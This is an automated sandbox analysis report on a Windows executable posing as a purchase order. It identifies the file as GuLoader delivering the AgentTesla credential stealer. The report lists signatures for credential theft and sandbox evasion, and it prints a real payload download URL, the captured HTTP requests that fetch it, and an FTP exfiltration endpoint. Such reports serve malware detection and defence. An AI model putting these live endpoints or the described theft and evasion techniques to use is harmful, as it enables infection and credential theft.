Windows Analysis Report
PO#4200000866.exe

Overview

General Information

Sample Name: PO#4200000866.exe
Analysis ID: 624323
MD5: 5d0444b70ff5caa4ec3b2ca2e563e724
SHA1: 27309fdae9005f71dcde3501f023819ae6dba6cb
SHA256: fd620fd2a9d5ca1dea1e11013eb4ec486f2f5cb340cd28bcbe39e78271fc5d26

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

AV Detection

Source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://finseb.com/qwer/COrg_ZBOJvB194.bin"}
Source: PO#4200000866.exe Virustotal: Detection: 10%
Source: ftp://ftp.solucionest.com.ar/log2 Avira URL Cloud: Label: malware
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20809708 CryptUnprotectData, 8_2_20809708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080A128 CryptUnprotectData, 8_2_2080A128
Source: PO#4200000866.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 131.226.4.8:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: PO#4200000866.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb22 source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B

Networking

Source: Malware configuration extractor URLs: http://finseb.com/qwer/COrg_ZBOJvB194.bin
Source: Joe Sandbox View ASN Name: UNASSIGNED UNASSIGNED
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: www.finseb.com
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: finseb.com
Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.solucionest.com.ar/log2
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.42144931318.000000001C661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://EQDgdAvRkA6D7Crd.com
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: PO#4200000866.exe String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: PO#4200000866.exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: PO#4200000866.exe String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: CasPol.exe, 00000008.00000003.42075500608.0000000001472000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46716043130.0000000001463000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: CasPol.exe, 00000008.00000003.42075500608.0000000001472000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46716043130.0000000001463000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://finseb.com/qwer/COrg_ZBOJvB194.bin
Source: PO#4200000866.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pXfISF.com
Source: PO#4200000866.exe String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: PO#4200000866.exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: PO#4200000866.exe String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: CasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: PO#4200000866.exe String found in binary or memory: http://subca.ocsp-certum.com01
Source: PO#4200000866.exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: PO#4200000866.exe String found in binary or memory: http://subca.ocsp-certum.com05
Source: PO#4200000866.exe String found in binary or memory: http://www.certum.pl/CPS0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, iso_3166.xml.1.dr String found in binary or memory: http://www.iso.org/iso/country_codes
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: https://www.asus.com/campaign/aura/global/download.php
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.finseb.com/
Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.finseb.com/X
Source: CasPol.exe, 00000008.00000002.46715733863.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.finseb.com/qwer/COrg_ZBOJvB194.bin
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: finseb.com
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405809

System Summary

Source: initial sample Static PE information: Filename: PO#4200000866.exe
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00406D5F 1_2_00406D5F
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D1BFF 1_2_715D1BFF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C822AF 1_2_03C822AF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C80A41 1_2_03C80A41
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BC0 1_2_03C71BC0
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7ABC9 1_2_03C7ABC9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77FC8 1_2_03C77FC8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C717D3 1_2_03C717D3
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BFF 1_2_03C71BFF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C777FC 1_2_03C777FC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70F8E 1_2_03C70F8E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71B8A 1_2_03C71B8A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71796 1_2_03C71796
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71F94 1_2_03C71F94
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77F4D 1_2_03C77F4D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70F57 1_2_03C70F57
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71F54 1_2_03C71F54
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7175B 1_2_03C7175B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C83362 1_2_03C83362
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71707 1_2_03C71707
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AB0D 1_2_03C7AB0D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71B0C 1_2_03C71B0C
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71714 1_2_03C71714
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71F10 1_2_03C71F10
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70F1A 1_2_03C70F1A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C782C5 1_2_03C782C5
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C702C2 1_2_03C702C2
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77ED7 1_2_03C77ED7
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71ED0 1_2_03C71ED0
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71ADC 1_2_03C71ADC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C832E6 1_2_03C832E6
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C716E8 1_2_03C716E8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C76A82 1_2_03C76A82
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71E9F 1_2_03C71E9F
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71AAA 1_2_03C71AAA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77EA8 1_2_03C77EA8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70EB8 1_2_03C70EB8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70240 1_2_03C70240
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B64A 1_2_03C7B64A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71A69 1_2_03C71A69
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71E68 1_2_03C71E68
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A67E 1_2_03C7A67E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7027D 1_2_03C7027D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AA7D 1_2_03C7AA7D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71A23 1_2_03C71A23
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A9CA 1_2_03C7A9CA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C84DC7 1_2_03C84DC7
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71DEF 1_2_03C71DEF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C719EB 1_2_03C719EB
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7018E 1_2_03C7018E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71DB2 1_2_03C71DB2
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A9B9 1_2_03C7A9B9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C78156 1_2_03C78156
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71967 1_2_03C71967
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71965 1_2_03C71965
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B56E 1_2_03C7B56E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A96C 1_2_03C7A96C
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71D6A 1_2_03C71D6A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C76D71 1_2_03C76D71
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70100 1_2_03C70100
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AD11 1_2_03C7AD11
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B52E 1_2_03C7B52E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71931 1_2_03C71931
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7793D 1_2_03C7793D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7ACCA 1_2_03C7ACCA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A8DD 1_2_03C7A8DD
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A0E2 1_2_03C7A0E2
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C778E1 1_2_03C778E1
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C718EA 1_2_03C718EA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B4F7 1_2_03C7B4F7
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71CF5 1_2_03C71CF5
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A8F3 1_2_03C7A8F3
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B080 1_2_03C7B080
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7788D 1_2_03C7788D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7788B 1_2_03C7788B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77092 1_2_03C77092
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7189A 1_2_03C7189A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C780A9 1_2_03C780A9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C718A8 1_2_03C718A8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71CB4 1_2_03C71CB4
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C700BC 1_2_03C700BC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C700BA 1_2_03C700BA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7104D 1_2_03C7104D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AC77 1_2_03C7AC77
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71C73 1_2_03C71C73
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70072 1_2_03C70072
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71872 1_2_03C71872
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B003 1_2_03C7B003
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70001 1_2_03C70001
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7000B 1_2_03C7000B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7100B 1_2_03C7100B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71809 1_2_03C71809
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C8283A 1_2_03C8283A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7003D 1_2_03C7003D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7183C 1_2_03C7183C
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71C39 1_2_03C71C39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_0104F740 8_2_0104F740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_010437C0 8_2_010437C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_0104DE28 8_2_0104DE28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_01042A70 8_2_01042A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B6B63 8_2_1D6B6B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6BA160 8_2_1D6BA160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B9890 8_2_1D6B9890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B9548 8_2_1D6B9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20806088 8_2_20806088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080D9F0 8_2_2080D9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20800B13 8_2_20800B13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080B458 8_2_2080B458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080DD90 8_2_2080DD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080F118 8_2_2080F118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080ED40 8_2_2080ED40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20807260 8_2_20807260
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C842AE NtProtectVirtualMemory, 1_2_03C842AE
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C822AF NtAllocateVirtualMemory, 1_2_03C822AF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C84890 NtResumeThread, 1_2_03C84890
Source: library.dll.1.dr Static PE information: No import functions for PE file found
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeviceServicePlugin.dllL vs PO#4200000866.exe
Source: PO#4200000866.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\PO#4200000866.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
Source: PO#4200000866.exe Static PE information: invalid certificate
Source: library.dll.1.dr Static PE information: Section .rsrc
Source: PO#4200000866.exe Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\PO#4200000866.exe File read: C:\Users\user\Desktop\PO#4200000866.exe
Source: PO#4200000866.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO#4200000866.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\PO#4200000866.exe "C:\Users\user\Desktop\PO#4200000866.exe"
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO#4200000866.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\nshFE95.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/12@4/1
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\PO#4200000866.exe File read: C:\Users\desktop.ini
